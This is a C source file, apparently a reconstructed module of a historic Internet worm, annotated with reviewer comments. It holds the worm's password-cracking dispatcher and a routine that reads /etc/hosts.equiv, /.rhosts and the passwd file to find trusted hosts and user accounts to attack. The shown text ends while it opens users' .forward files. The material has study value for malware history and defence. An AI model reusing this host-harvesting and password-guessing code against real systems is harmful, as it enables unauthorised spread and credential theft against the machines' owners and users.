/* Dover */
#include "worm.h"
#include <stdio.h>
#include <ctype.h>
#include <strings.h>
#include <pwd.h>
/*
 * Strategy selector read by cracksome(): the values 0, 1, 2 and 3 pick
 * strat_0(), strat_1(), try_words() and dict_words() respectively.
 * Nothing in the part of the file reviewed here assigns it.
 */
int cmode;
/*
 * Host-table lookup defined in another translation unit.  strat_0() calls it
 * with a host name and a 0/1 second argument and compares the result with 0.
 * Old-style declaration without a prototype: the compiler does not check the
 * argument list at call sites.
 */
extern struct hst *h_name2host();
/*
 * One node of a singly linked list of account records (linked through `next`).
 *
 * The size and offset annotations describe the original binary this listing
 * was reconstructed from.  They imply 4-byte pointers (four pointers precede
 * offset 16) and no alignment padding before `homedir` (a pointer at offset
 * 46), so they will not hold on ABIs with 8-byte or aligned pointers.
 */
struct usr { /* sizeof(usr) == 58 */
/* name plus three pointer slots whose purpose was not recovered (o4/o8/o12
 * are just their byte offsets). */
char *name, *o4, *o8, *o12;
/* NOTE(review): presumably the stored password hash copied from the account
 * entry; confirm against the code that fills it. */
char passwd[14]; /* offset 16 */
/* NOTE(review): presumably the recovered cleartext once a guess matches;
 * confirm against the code that fills it. */
char decoded_passwd[14]; /* 30 */
/* Two bytes between decoded_passwd (ends at 44) and homedir (46). */
short pad;
char *homedir; /* offset 46 */
char *gecos; /* offset 50 */
/* Next record in the list. */
struct usr *next; /* offset 54 */
};
/* Ahhh, I just love these names. Don't change them for anything. */
/*
 * Two file-private struct usr pointers.
 * NOTE(review): the names look like address-derived labels left over from the
 * disassembly; how they are used lies outside the part of the file reviewed
 * here.
 */
static struct usr *x27f28, *x27f2c;
/*
 * Run one password-guessing stage, chosen by the global cmode:
 *   0 -> strat_0()     1 -> strat_1()
 *   2 -> try_words()   3 -> dict_words()
 * Any other value of cmode does nothing.
 *
 * cmode is sampled once and this routine never writes it.
 * NOTE(review): stage advancement is presumably done by the stage routines
 * themselves; confirm in their bodies.
 *
 * The function has the implicit int return type of pre-ANSI C but yields no
 * value, so callers must not use its result.
 */
cracksome()
{
    int stage = cmode;

    if (stage == 0) {
        strat_0();			/* 88 */
    } else if (stage == 1) {
        strat_1();
    } else if (stage == 2) {
        try_words();
    } else if (stage == 3) {
        dict_words();
    }
}
/* Strategy 0: look through /etc/hosts.equiv and /.rhosts for new hosts. */
strat_0() /* 0x5da4 */
{
FILE *hosteq;
char scanbuf[512];
char fwd_buf[256];
char *fwd_host;
char getbuf[256];
struct passwd *pwent;
char local[20];
struct usr *user;
struct hst *host; /* 1048 */
int check_other_cnt; /* 1052 */
static struct usr *user_list = NULL;
hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
if (hosteq != NULL) { /* 292 */
while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
host = h_name2host(scanbuf, 0);
if (host == 0) {
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0) /* 158 */
continue;
host->flag |= 8;
}
fclose(hosteq); /* 280 */
}
hosteq = fopen(XS("/.rhosts"), XS("r"));
if (hosteq != NULL) { /* 516 */
while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
continue;
host = h_name2host(scanbuf, 0);
while (host == 0) { /* 436, 474 */
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0)
continue;
host->flag |= 8;
}
fclose(hosteq);
}
/* look through the passwd file, checking for contact with others every
* tenth entry. */
setpwent();
check_other_cnt = 0; /* 522 */
while ((pwent = getpwent()) != 0) { /* 526, 1124 */
if ((check_other_cnt % 10) == 0)
other_sleep(0);
check_other_cnt++;
sprintf(fwd_buf, XS("%.200s/.forward"), pwent->pw_dir);
hosteq = fopen(fwd_buf, XS("r"));...